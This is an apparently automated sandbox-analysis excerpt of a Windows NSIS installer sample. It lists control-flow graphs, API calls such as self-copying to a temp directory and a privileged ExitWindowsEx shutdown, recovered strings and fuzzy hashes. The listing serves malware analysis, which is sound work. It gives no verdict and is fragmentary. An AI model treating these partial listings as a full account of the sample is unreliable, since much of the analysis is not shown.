54 403ae1-403af1 call 405ca0 ExitProcess 40->54 55 403bce-403bd4 40->55 46 403ab5-403abc call 40592c 41->46 47 403a57-403a60 call 405d06 41->47 43->38 43->44 44->38 53 403ac1-403ac7 call 4060e7 46->53 57 403a79-403a7b 47->57 53->40 60 403c51-403c59 55->60 61 403bd6-403bf3 call 4062fc * 3 55->61 56->14 65 403a62-403a74 call 403800 57->65 66 403a7d-403a87 57->66 67 403c5b 60->67 68 403c5f 60->68 92 403bf5-403bf7 61->92 93 403c3d-403c48 ExitWindowsEx 61->93 65->66 79 403a76 65->79 73 403af7-403b11 lstrcatW lstrcmpiW 66->73 74 403a89-403a99 call 40677e 66->74 67->68 73->40 78 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 73->78 74->40 85 403a9b-403ab1 call 406009 * 2 74->85 82 403b36-403b56 call 406009 * 2 78->82 83 403b2b-403b31 call 406009 78->83 79->57 99 403b5b-403b77 call 406805 DeleteFileW 82->99 83->82 85->46 92->93 97 403bf9-403bfb 92->97 93->60 96 403c4a-403c4c call 40141d 93->96 96->60 97->93 101 403bfd-403c0f GetCurrentProcess 97->101 107 403bb8-403bc0 99->107 108 403b79-403b89 CopyFileW 99->108 101->93 106 403c11-403c33 101->106 106->93 107->99 109 403bc2-403bc9 call 406c68 107->109 108->107 110 403b8b-403bab call 406c68 call 406805 call 405c3f 108->110 109->40 110->107 120 403bad-403bb4 CloseHandle 110->120 120->107
                                                        APIs
                                                        • #17.COMCTL32 ref: 004038A2
                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",00000000), ref: 00403904
                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",00000020), ref: 0040392B
                                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                        • OleUninitialize.OLE32(?), ref: 00403AD1
                                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                        • lstrcmpiW.KERNEL32(004D70C8,C:\Users\user\Desktop,004D70C8,~nsu.tmp), ref: 00403B09
                                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe,004331E8,00000001), ref: 00403B81
                                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                        • String ID: /D=$ _?=$"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"$C:\Users\user\Desktop$C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                        • API String ID: 2435955865-1845741877
                                                        • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                        • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 631 4074bb-4074c0 632 4074c2-4074ef 631->632 633 40752f-407547 631->633 635 4074f1-4074f4 632->635 636 4074f6-4074fa 632->636 634 407aeb-407aff 633->634 640 407b01-407b17 634->640 641 407b19-407b2c 634->641 637 407506-407509 635->637 638 407502 636->638 639 4074fc-407500 636->639 642 407527-40752a 637->642 643 40750b-407514 637->643 638->637 639->637 644 407b33-407b3a 640->644 641->644 647 4076f6-407713 642->647 648 407516 643->648 649 407519-407525 643->649 645 407b61-407c68 644->645 646 407b3c-407b40 644->646 662 407350 645->662 663 407cec 645->663 651 407b46-407b5e 646->651 652 407ccd-407cd4 646->652 654 407715-407729 647->654 655 40772b-40773e 647->655 648->649 650 407589-4075b6 649->650 658 4075d2-4075ec 650->658 659 4075b8-4075d0 650->659 651->645 656 407cdd-407cea 652->656 660 407741-40774b 654->660 655->660 661 407cef-407cf6 656->661 664 4075f0-4075fa 658->664 659->664 665 40774d 660->665 666 4076ee-4076f4 660->666 667 407357-40735b 662->667 668 40749b-4074b6 662->668 669 40746d-407471 662->669 670 4073ff-407403 662->670 663->661 673 407600 664->673 674 407571-407577 664->674 675 407845-4078a1 665->675 676 4076c9-4076cd 665->676 666->647 672 407692-40769c 666->672 667->656 677 407361-40736e 667->677 668->634 682 407c76-407c7d 669->682 683 407477-40748b 669->683 688 407409-407420 670->688 689 407c6d-407c74 670->689 678 4076a2-4076c4 672->678 679 407c9a-407ca1 672->679 691 407556-40756e 673->691 692 407c7f-407c86 673->692 680 40762a-407630 674->680 681 40757d-407583 674->681 675->634 684 407c91-407c98 676->684 685 4076d3-4076eb 676->685 677->663 693 407374-4073ba 677->693 678->675 679->656 694 40768e 680->694 695 407632-40764f 680->695 681->650 681->694 682->656 690 40748e-407496 683->690 684->656 685->666 696 407423-407427 688->696 689->656 690->669 700 407498 690->700 691->674 692->656 698 4073e2-4073e4 693->698 699 4073bc-4073c0 693->699 694->672 701 407651-407665 695->701 702 407667-40767a 695->702 696->670 697 407429-40742f 696->697 704 407431-407438 697->704 705 407459-40746b 697->705 708 4073f5-4073fd 698->708 709 4073e6-4073f3 698->709 706 4073c2-4073c5 GlobalFree 699->706 707 4073cb-4073d9 GlobalAlloc 699->707 700->668 703 40767d-407687 701->703 702->703 703->680 710 407689 703->710 711 407443-407453 GlobalAlloc 704->711 712 40743a-40743d GlobalFree 704->712 705->690 706->707 707->663 713 4073df 707->713 708->696 709->708 709->709 715 407c88-407c8f 710->715 716 40760f-407627 710->716 711->663 711->705 712->711 713->698 715->656 716->680
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                        • String ID:
                                                        • API String ID: 310444273-0
                                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                        • FindClose.KERNEL32(00000000), ref: 004062EC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 121 4015a0-4015f4 122 4030e3-4030ec 121->122 123 4015fa 121->123 147 4030ee-4030f2 122->147 125 401601-401611 call 4062a3 123->125 126 401742-40174f 123->126 127 401962-40197d call 40145c GetFullPathNameW 123->127 128 4019ca-4019e6 call 40145c SearchPathW 123->128 129 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 123->129 130 401650-401668 call 40137e call 4062a3 call 40139d 123->130 131 4017b1-4017d8 call 40145c call 4062a3 call 405d59 123->131 132 401672-401686 call 40145c call 4062a3 123->132 133 401693-4016ac call 401446 call 4062a3 123->133 134 401715-401731 123->134 135 401616-40162d call 40145c call 4062a3 call 404f72 123->135 136 4016d6-4016db 123->136 137 401736-4030de 123->137 138 401897-4018a7 call 40145c call 4062d5 123->138 139 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 123->139 140 40163c-401645 123->140 141 4016bd-4016d1 call 4062a3 SetForegroundWindow 123->141 125->147 151 401751-401755 ShowWindow 126->151 152 401758-40175f 126->152 186 4019a3-4019a8 127->186 187 40197f-401984 127->187 128->122 179 4019ec-4019f8 128->179 129->122 204 40179a-4017a6 call 4062a3 129->204 213 40166d 130->213 226 401864-40186c 131->226 227 4017de-4017fc call 405d06 CreateDirectoryW 131->227 205 401689-40168e call 404f72 132->205 210 4016b1-4016b8 Sleep 133->210 211 4016ae-4016b0 133->211 134->147 148 401632-401637 135->148 145 401702-401710 136->145 146 4016dd-4016fd call 401446 136->146 137->122 181 4030de call 405f51 137->181 206 4018c2-4018d6 call 4062a3 138->206 207 4018a9-4018bd call 4062a3 138->207 234 401912-401919 139->234 235 40191e-401921 139->235 140->148 149 401647-40164e PostQuitMessage 140->149 141->122 145->122 146->122 148->147 149->148 151->152 152->122 170 401765-401769 ShowWindow 152->170 170->122 179->122 181->122 190 4019af-4019b2 186->190 187->190 197 401986-401989 187->197 190->122 200 4019b8-4019c5 GetShortPathNameW 190->200 197->190 208 40198b-401993 call 4062d5 197->208 200->122 221 4017ab-4017ac 204->221 205->122 206->147 207->147 208->186 231 401995-4019a1 call 406009 208->231 210->122 211->210 213->147 221->122 229 401890-401892 226->229 230 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 226->230 239 401846-40184e call 4062a3 227->239 240 4017fe-401809 GetLastError 227->240 229->205 230->122 231->190 234->205 241 401923-40192b call 4062d5 235->241 242 40194a-401950 235->242 254 401853-401854 239->254 245 401827-401832 GetFileAttributesW 240->245 246 40180b-401825 GetLastError call 4062a3 240->246 241->242 260 40192d-401948 call 406c68 call 404f72 241->260 250 401957-40195d call 4062a3 242->250 252 401834-401844 call 4062a3 245->252 253 401855-40185e 245->253 246->253 250->221 252->254 253->226 253->227 254->253 260->250
                                                        APIs
                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                        • ShowWindow.USER32(?), ref: 00401753
                                                        • ShowWindow.USER32(?), ref: 00401767
                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                        • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                        Strings
                                                        • Rename failed: %s, xrefs: 0040194B
                                                        • Rename on reboot: %s, xrefs: 00401943
                                                        • Aborting: "%s", xrefs: 0040161D
                                                        • detailprint: %s, xrefs: 00401679
                                                        • Rename: %s, xrefs: 004018F8
                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                        • BringToFront, xrefs: 004016BD
                                                        • Sleep(%d), xrefs: 0040169D
                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                        • Call: %d, xrefs: 0040165A
                                                        • Jump: %d, xrefs: 00401602
                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                        • API String ID: 2872004960-3619442763
                                                        • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                        • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 267 40592c-405944 call 4062fc 270 405946-405956 call 405f51 267->270 271 405958-405990 call 405ed3 267->271 279 4059b3-4059dc call 403e95 call 40677e 270->279 276 405992-4059a3 call 405ed3 271->276 277 4059a8-4059ae lstrcatW 271->277 276->277 277->279 285 405a70-405a78 call 40677e 279->285 286 4059e2-4059e7 279->286 292 405a86-405a8d 285->292 293 405a7a-405a81 call 406805 285->293 286->285 287 4059ed-405a15 call 405ed3 286->287 287->285 294 405a17-405a1b 287->294 296 405aa6-405acb LoadImageW 292->296 297 405a8f-405a95 292->297 293->292 301 405a1d-405a2c call 405d06 294->301 302 405a2f-405a3b lstrlenW 294->302 299 405ad1-405b13 RegisterClassW 296->299 300 405b66-405b6e call 40141d 296->300 297->296 298 405a97-405a9c call 403e74 297->298 298->296 306 405c35 299->306 307 405b19-405b61 SystemParametersInfoW CreateWindowExW 299->307 319 405b70-405b73 300->319 320 405b78-405b83 call 403e95 300->320 301->302 303 405a63-405a6b call 406722 call 406009 302->303 304 405a3d-405a4b lstrcmpiW 302->304 303->285 304->303 311 405a4d-405a57 GetFileAttributesW 304->311 310 405c37-405c3e 306->310 307->300 316 405a59-405a5b 311->316 317 405a5d-405a5e call 406751 311->317 316->303 316->317 317->303 319->310 325 405b89-405ba6 ShowWindow LoadLibraryW 320->325 326 405c0c-405c14 call 405047 320->326 328 405ba8-405bad LoadLibraryW 325->328 329 405baf-405bc1 GetClassInfoW 325->329 334 405c16-405c1c 326->334 335 405c2e-405c30 call 40141d 326->335 328->329 330 405bc3-405bd3 GetClassInfoW RegisterClassW 329->330 331 405bd9-405c0a DialogBoxParamW call 40141d call 403c68 329->331 330->331 331->310 334->319 337 405c22-405c29 call 40141d 334->337 335->306 337->319
                                                        APIs
                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                        • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"), ref: 00405A30
                                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                        • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"$.DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                        • API String ID: 608394941-78988019
                                                        • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                        • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                        • CompareFileTime.KERNEL32(-00000014,?,QuiBookstore,QuiBookstore,00000000,00000000,QuiBookstore,004CB0B0,00000000,00000000), ref: 00401AA0
